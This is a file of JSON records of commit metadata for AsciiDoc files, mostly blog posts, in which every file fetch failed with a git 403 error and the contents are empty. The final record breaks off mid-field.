{"commit":"54acfcaa100584a4da174796539d07d09769f3db","subject":"tree to blob Maven","message":"tree to blob Maven\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Checkstyle.adoc","new_file":"Dev tools\/Checkstyle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"666a16cc3a89bb1d4d3e1af64bbeb7f53da2dceb","subject":"#432 - Added code of conduct.","message":"#432 - Added code of conduct.","repos":"JamesTPF\/spring-hateoas","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JamesTPF\/spring-hateoas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb44596d432317bd38f05464f607de08b7fdd09e","subject":"y2b create post The 4 Dollar Android Smartphone","message":"y2b create post The 4 Dollar Android Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-11-The-4-Dollar-Android-Smartphone.adoc","new_file":"_posts\/2016-03-11-The-4-Dollar-Android-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"942155da11654b772987965c38ecde39e2f8a913","subject":"Update 2015-06-23-Ne-marche-plus.adoc","message":"Update 2015-06-23-Ne-marche-plus.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-06-23-Ne-marche-plus.adoc","new_file":"_posts\/2015-06-23-Ne-marche-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8894f745cb304662eb2a6c9ae83d0889b4b555","subject":"Update 2020-02-06-This-is-a-test.adoc","message":"Update 2020-02-06-This-is-a-test.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-06-This-is-a-test.adoc","new_file":"_posts\/2020-02-06-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bc351f2eb4f5398c6b81d3ddb30f98532e418cc","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"0740cae1503b2f368080c8f95e54bbb60af6a11a","subject":"2016-07-10-OxRunCar.adoc","message":"2016-07-10-OxRunCar.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-OxRunCar.adoc","new_file":"_posts\/2016-07-10-OxRunCar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"832119a9efa2e71c7012834e49eed6fba2bfa2bc","subject":"Create deployment-docker.adoc","message":"Create deployment-docker.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/platform\/includes\/deployment-docker.adoc","new_file":"userguide\/platform\/includes\/deployment-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fd57d271a73c5453bfdc7e2b5845ab8c027c1e5","subject":"Update 2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","message":"Update 2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","new_file":"_posts\/2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93f757570c820c76359ca868b36a5560a01002a6","subject":"Update 2015-06-16-Episode-19-Pitch-Slapped.adoc","message":"Update 2015-06-16-Episode-19-Pitch-Slapped.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-06-16-Episode-19-Pitch-Slapped.adoc","new_file":"_posts\/2015-06-16-Episode-19-Pitch-Slapped.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a334331d562a861ce8c504999057b938e40e042","subject":"Update 2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64071f0926f3a22839976d42c059f321042111d5","subject":"Update 2018-08-28-Reducing-network-latency.adoc","message":"Update 
2018-08-28-Reducing-network-latency.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-28-Reducing-network-latency.adoc","new_file":"_posts\/2018-08-28-Reducing-network-latency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d38a59e8399901a062deb6c84b4a6d4e675048d6","subject":"Install notes","message":"Install notes\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"591b4577e623db6affde456ec31f864bbcf593b8","subject":"Update 2016-09-05-Shapeless-Introduction-resources.adoc","message":"Update 2016-09-05-Shapeless-Introduction-resources.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-09-05-Shapeless-Introduction-resources.adoc","new_file":"_posts\/2016-09-05-Shapeless-Introduction-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf586857467f3c5a2858a395bb062fa53315ee53","subject":"Update from adoc-editor","message":"Update from adoc-editor","repos":"asciidoctor\/docker-asciidoctorj","old_file":"2015-03-01-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"2015-03-01-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/docker-asciidoctorj.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b49477d14cd285ccfdab745a2545200c778515","subject":"Update 2015-10-17-Loading-FITS-data-in-browser.adoc","message":"Update 2015-10-17-Loading-FITS-data-in-browser.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Loading-FITS-data-in-browser.adoc","new_file":"_posts\/2015-10-17-Loading-FITS-data-in-browser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d83fabc7c6dc6652b293c3af20c612c8be2ff8","subject":"Update 2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","message":"Update 2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","new_file":"_posts\/2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"650fea2ce0b4992ea9ece66faea761af77f7718d","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e2bfa418f9eefaa85d5a36975d0e3206c6d87a","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aa8aa5b097d115841d8a9da80b543b2eaa5242c","subject":"Add authorization design doc","message":"Add authorization design doc\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/authorization.adoc","new_file":"documentation\/design_docs\/design\/authorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34f118966b450288b7e1a337475b45355e4f5d71","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a64ba91d7ae180e10d65b645a2b727e255e8d72e","subject":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","message":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6987d295df3fd7d1af5e89ae51ebffc877ce7fa6","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 
2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9aadcdb58e44ff8c2c662797c7fedbd20a8f7482","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c430e3c6e58c03927c9d9c24df379b389a340bbf","subject":"Update 2016-10-07-Modular-Mobile-Technology.adoc","message":"Update 2016-10-07-Modular-Mobile-Technology.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-10-07-Modular-Mobile-Technology.adoc","new_file":"_posts\/2016-10-07-Modular-Mobile-Technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a9aa2be71aa3fb9841f4a435fa18c08d177c2c8","subject":"Update 2018-01-06-calculator-app-with-Swift.adoc","message":"Update 2018-01-06-calculator-app-with-Swift.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5451f193b8bd4d467046dbcf9d952dd86b157854","subject":"Update 2019-09-30-Microservices-With-Nodejs.adoc","message":"Update 2019-09-30-Microservices-With-Nodejs.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2019-09-30-Microservices-With-Nodejs.adoc","new_file":"_posts\/2019-09-30-Microservices-With-Nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35c23aee9d623204060f88f0bfe2106b2bd9dd55","subject":"Decisions framework","message":"Decisions framework\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"DECISIONS.adoc","new_file":"DECISIONS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"66e77d2f24b2d9ead4517c6df9e870a76af3c8e0","subject":"Update 2016-07-21-Another-Test-Post.adoc","message":"Update 2016-07-21-Another-Test-Post.adoc","repos":"jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io","old_file":"_posts\/2016-07-21-Another-Test-Post.adoc","new_file":"_posts\/2016-07-21-Another-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jborichevskiy\/jborichevskiy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53dd4aca2d5ea07481d4d6741d8c3211ca286d44","subject":"Update 2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","message":"Update 2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","new_file":"_posts\/2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c73dc9b65b621e347ea43ec246bbd45e39d25f59","subject":"Update 2016-04-11-ip.adoc","message":"Update 2016-04-11-ip.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-11-ip.adoc","new_file":"_posts\/2016-04-11-ip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaa7e80a0a15ab13c23b4f5e0c3c850c44cb6176","subject":"y2b create post BlackBerry Z10 Unboxing \\u0026 Overview","message":"y2b create post BlackBerry Z10 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-30-BlackBerry-Z10-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-30-BlackBerry-Z10-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"207d45051ec35c9d773e93cd1a28373bb2b0efbb","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f6022e76fd125ff6ffeaa01e3ed5481233000e","subject":"typo","message":"typo\n\nChange-Id: I7e08220554f82019ef9f6efe0ae4ed9be8d556a6\nSigned-off-by: Yaroslav Brustinov 
<58a360e80ce67a871f076847d255453a99d22580@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25f5fe789063b2611acff02622812fb33233bb08","subject":"Update 2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","message":"Update 2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","new_file":"_posts\/2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4091270a54e698c84d988b8ec2f059b33a15447f","subject":"Update 2015-06-03-Running-an-Akka-Actor-forever.adoc","message":"Update 2015-06-03-Running-an-Akka-Actor-forever.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-06-03-Running-an-Akka-Actor-forever.adoc","new_file":"_posts\/2015-06-03-Running-an-Akka-Actor-forever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664039ed8660e0425c47bc1d7eca4ff0722e4d69","subject":"Update 2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","message":"Update 2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19313af130542a68122816c398af5aa6bfe57fe5","subject":"Fix problem with a command def being bulleted.","message":"Fix problem with a command def being bulleted.\n","repos":"dpquigl\/YAM","old_file":"docs\/CommandDefs.adoc","new_file":"docs\/CommandDefs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dpquigl\/YAM.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d49163fc016ed0e3c6e58b82c45b7ec9f3565d2","subject":"Init of article on gatsby and asciidoctor","message":"Init of article on gatsby and asciidoctor\n","repos":"ochaloup\/blog.chalda.cz,ochaloup\/blog.chalda.cz","old_file":"content\/posts\/2022-10-30-Gatsby-and-Asciidoctor.adoc","new_file":"content\/posts\/2022-10-30-Gatsby-and-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ochaloup\/blog.chalda.cz.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2b8a1b967381f14e8680652e0f2885764e29f60c","subject":"Add changelog","message":"Add changelog\n","repos":"jirutka\/ssh-ldap-pubkey,jirutka\/ssh-ldap-pubkey","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ssh-ldap-pubkey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d8fe3dc9851e14163c87d4d9fa58f7d8b37547","subject":"johndoe.adoc: tweak formatting","message":"johndoe.adoc: tweak formatting\n\n* add section 'justification for the feature'\n* minor cosmetic tweaks\n","repos":"damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3","old_file":"docs\/team\/johndoe.adoc","new_file":"docs\/team\/johndoe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6eb2a883b3939bc1ed1d726a0c5200e23800c07","subject":"Move from Markdown to Asciidoc for ChangeLog","message":"Move from Markdown to Asciidoc for ChangeLog\n","repos":"ccw-ide\/ccw,noncom\/ccw,noncom\/ccw,laurentpetit\/ccw,michelangelo13\/ccw,noncom\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,michelangelo13\/ccw","old_file":"ChangeLog.adoc","new_file":"ChangeLog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e38f00a55fc3af2d6422c2a6d05dea71fa0eb4d9","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d437bc695fb206e16c1361baca05a5b39bcf898e","subject":"Update 2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","message":"Update 2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","new_file":"_posts\/2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b0ec37095107b8dbd0aeb223314e973d4c14126","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 
2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c6cb0951d89a2c8ca095ac614cd8f55c5cd4b6","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 